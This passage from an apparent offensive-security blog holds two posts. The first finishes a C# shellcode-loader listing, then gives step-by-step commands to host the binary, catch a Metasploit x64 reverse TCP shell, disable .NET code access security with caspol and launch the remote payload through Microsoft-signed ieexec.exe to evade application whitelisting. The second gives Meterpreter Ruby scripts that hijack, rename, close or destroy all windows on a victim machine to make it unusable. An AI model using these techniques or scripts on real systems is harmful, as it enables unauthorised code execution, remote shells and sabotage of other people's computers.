        private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );

        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds );

        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle( string moduleName );

        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress( IntPtr hModule, string procName );

        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary( string lpFileName );

        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
        
        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESSOR_INFO
        {
            public UInt32 dwMax;
            public UInt32 id0;
            public UInt32 id1;
            public UInt32 id2;
            public UInt32 dwStandard;
            public UInt32 dwFeature;

            // if AMD 
            public UInt32 dwExt;
        }
    }
}

You will want to compile the exe for the target platform. In this case I am going for an x64 target. Also, you will want to compile for 2.0 or 3.5 Framework.

Step 3. Host the Exe. For this example, I used Mongoose. Simple and Effective:

http://code.google.com/p/mongoose/

By default Mongoose listens on port 8080. This is configurable. Simple place your compiled binary from step 2 into the same directory as Mongoose. Start Mongoose and you are almost ready to deliver your payload.

Step 4. Setup your receiver:

1
2
3
4
5

msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set PAYLOAD windows/x64/shell/reverse_tcp
msf exploit(handler) > exploit -j

Step 5. From the host that is protected via Whitelisting. Open 2 Command Prompts as administrator.

CMD 1 Execute:

1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s off

CMD 2 Execute:

1

C:\Windows\Microsoft.NET\Framework64\v2.0.50727>ieexec.exe http://x.x.x.x:8080/bypass.exe

There is some detail to unpack here, I can go over later, as to why we need to run caspol.exe. Here’s the behavior I saw in our experimentation with this.

Initial attempt to run our rogue binary fails, since it is unknown/untrusted/unapproved:

Now, on the same host…

Executes just fine!

Its important to distinguish what this technique is and what it is not. This is not an exploit or vulnerability. Rather this is one way to execute arbitraty code in an Application Whitelisting Environment.

Summary:

In this document we learned that even if a host is in a mode where only trusted approved applications can run. IEexec.exe can be used in certain situations to circumvent a Whitelist, since it is likely a trusted binary, since it is signed by Microsoft.

Cheers,

=> @infosecsmith2

ExtAPI Pranks

| Comments

Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write up on it and more amazing things he did in 3 months of meterpreter and on the Metasploit blog.

Just brushing the surface and to help people see the power of this new functionality I went ahead and created a few Meterpreter scripts that can really mess with someone.

1st is a script that loops through all of the windows for your current user and sets the focus to them in rotation. Essentially making their machine unusable.

1
2
3
4
5
6
7
8
9
10
11
12
13

# Code loops around each of the windows
# that the current user has open and switches
# focus to each of them in rotation... 100 times.

(0..100).each do |x|
  windows = client.extapi.window.enumerate
  windows.each do |winder|
      if winder[:title] != 'Default IME'
          result = client.railgun.user32.SetForegroundWindow(winder[:handle])
      end
  end
  print_status("Round #{x}")
end

2nd just sets all of the windows title’s the say “hacked”

1
2
3
4
5
6

windows = client.extapi.window.enumerate
windows.each do |winder|
  if winder[:title] != 'Default IME'
    result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked")
  end
end

and finally if in Windows if you close all of the windows, including “invisible” ones like Explorer, you will essentially make the machine unusable.

1
2
3
4

windows = client.extapi.window.enumerate
windows.each do |winder|
  result = client.railgun.user32.CloseWindow(winder[:handle])
end

OJ suggested a few other options:

Destroy:

1
2
3
4

windows = client.extapi.window.enumerate
windows.each do |winder|
    result = client.railgun.user32.DestroyWindow(winder[:handle])
end

or Minimize all:

1
2
3
4

windows = client.extapi.window.enumerate
windows.each do |winder|
    result = client.railgun.user32.ShowWindow(winder[:handle], 6)
end

Thats it for now, next up we will do a few things with services as well as the clipboard. Stay tuned!